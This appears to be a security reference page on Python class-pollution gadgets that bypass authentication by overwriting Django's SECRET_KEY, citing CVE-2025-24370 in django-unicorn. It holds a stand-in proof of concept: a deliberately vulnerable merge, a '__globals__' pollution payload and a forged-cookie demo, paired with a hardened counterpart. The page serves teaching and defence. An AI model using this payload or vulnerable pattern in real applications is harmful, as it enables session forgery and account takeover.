Auth Bypass Gadgets
Auth bypass gadgets let the attacker forge credentials, escalate privileges, or skip an access check outright. The most powerful variants overwrite a signing key: once the attacker controls the key that session cookies and tokens are signed with, they can mint a valid session for any user without ever guessing a password.
Third-party packages

| Library | Trigger | Polluted property |
| --- | --- | --- |
| django.core.signing | Signer.sign / Signer.unsign; covers session cookies, CSRF tokens and password-reset tokens | django.conf.settings.SECRET_KEY |

Signer falls back to settings.SECRET_KEY when no key is passed explicitly, and signing.dumps / signing.loads build a fresh Signer on every call, so the polluted key is in effect on the very next request. Signer.unsign also accepts signatures made with any key listed in settings.SECRET_KEY_FALLBACKS, so that list is an equivalent target.
Real-world cases

| Application | Polluted property | Mechanism | CVE |
| --- | --- | --- | --- |
| django-unicorn | django.conf.settings.SECRET_KEY | Attacker-controlled property path in a component message, applied by set_property_value | CVE-2025-24370 |
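The following is an added example, not code from this page, from Django, or from django-unicorn. It models the SECRET_KEY gadget and the set_property_value-style entry point end to end without importing Django: a stand-in `Settings` object, a simplified `Signer` that resolves `settings.SECRET_KEY` the way Django's does, a vulnerable recursive `merge()` of the kind a property-setting handler exposes, the pollution payload (constructed here), and a `safe_merge()` that refuses it. Every class and function name is a stand-in chosen for this example.

```python
"""Stand-in reproduction of the SECRET_KEY gadget (added example, not Django code).

`Settings`, `Signer`, `Component`, `merge` and `safe_merge` are simplified
re-implementations written for this page; POLLUTION_PAYLOAD is constructed.
"""
import base64
import hashlib
import hmac


class Settings:
    """Stand-in for django.conf.settings: a plain attribute holder."""

    def __init__(self, secret_key):
        self.SECRET_KEY = secret_key


settings = Settings("server-only-secret")  # the attacker never learns this value


class Signer:
    """Simplified stand-in for django.core.signing.Signer.

    As in Django, `key` defaults to None and is resolved to settings.SECRET_KEY
    when the Signer is built; Django builds a fresh Signer for every dumps/loads
    call, so a polluted setting is used on the very next request.
    """

    def __init__(self, key=None, salt="django.core.signing.Signer", sep=":"):
        self.key = key or settings.SECRET_KEY
        self.salt = salt
        self.sep = sep

    def signature(self, value):
        # Salted HMAC in the style of django.utils.crypto.salted_hmac:
        # derive the MAC key from salt + secret, then HMAC-SHA256 the value.
        derived = hashlib.sha256((self.salt + "signer" + self.key).encode()).digest()
        mac = hmac.new(derived, value.encode(), hashlib.sha256).digest()
        return base64.urlsafe_b64encode(mac).decode().rstrip("=")

    def sign(self, value):
        return f"{value}{self.sep}{self.signature(value)}"

    def unsign(self, signed):
        value, _, sig = signed.rpartition(self.sep)
        if not hmac.compare_digest(sig, self.signature(value)):
            raise ValueError("BadSignature")
        return value


class Component:
    """Stand-in for a component whose attributes are filled from a client message."""

    def __init__(self):
        self.name = "demo"


def merge(src, dst):
    """Vulnerable recursive merge: the class-pollution primitive.

    Keys are applied with item assignment or setattr and dunder names are not
    rejected, so "__init__" -> "__globals__" walks from any instance into this
    module's namespace, where `settings` lives.
    """
    for key, value in src.items():
        if hasattr(dst, "__getitem__"):  # dict-like target, e.g. a __globals__ dict
            if key in dst and isinstance(value, dict):
                merge(value, dst[key])
            else:
                dst[key] = value
        elif hasattr(dst, key) and isinstance(value, dict):
            merge(value, getattr(dst, key))
        else:
            setattr(dst, key, value)


def safe_merge(src, dst, allowed):
    """Hardened counterpart: flat allowlist of public attribute names, no recursion."""
    for key, value in src.items():
        if key.startswith("_") or key not in allowed:
            raise ValueError(f"refusing to set attribute {key!r}")
        setattr(dst, key, value)


# Constructed attacker payload: the path from a component instance to the setting.
POLLUTION_PAYLOAD = {
    "__init__": {"__globals__": {"settings": {"SECRET_KEY": "attacker-chosen-key"}}}
}


def server_accepts(cookie):
    """Server side: a Signer per request, as Django's signing.loads does."""
    try:
        Signer().unsign(cookie)
        return True
    except ValueError:
        return False


def run_attack():
    """Returns (accepted before pollution, accepted after pollution)."""
    forged = Signer(key="attacker-chosen-key").sign("user_id=1")  # attacker's own key
    before = server_accepts(forged)         # False: the server's key differs
    merge(POLLUTION_PAYLOAD, Component())   # the vulnerable handler applies the message
    after = server_accepts(forged)          # True: settings.SECRET_KEY is now the attacker's
    return before, after


def hardened_rejects(payload):
    """True when safe_merge refuses the same payload."""
    try:
        safe_merge(payload, Component(), frozenset({"name"}))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(run_attack())                          # (False, True)
    print(hardened_rejects(POLLUTION_PAYLOAD))   # True
```

The decisive property is that the signer reads the key from a mutable settings object rather than holding it privately, so any write primitive that can reach the module namespace (here through `__init__.__globals__`) rewrites the trust anchor for every later request. The hardened merge closes the primitive rather than the gadget: it refuses underscore-prefixed names and anything outside an explicit allowlist, and never recurses into existing attributes.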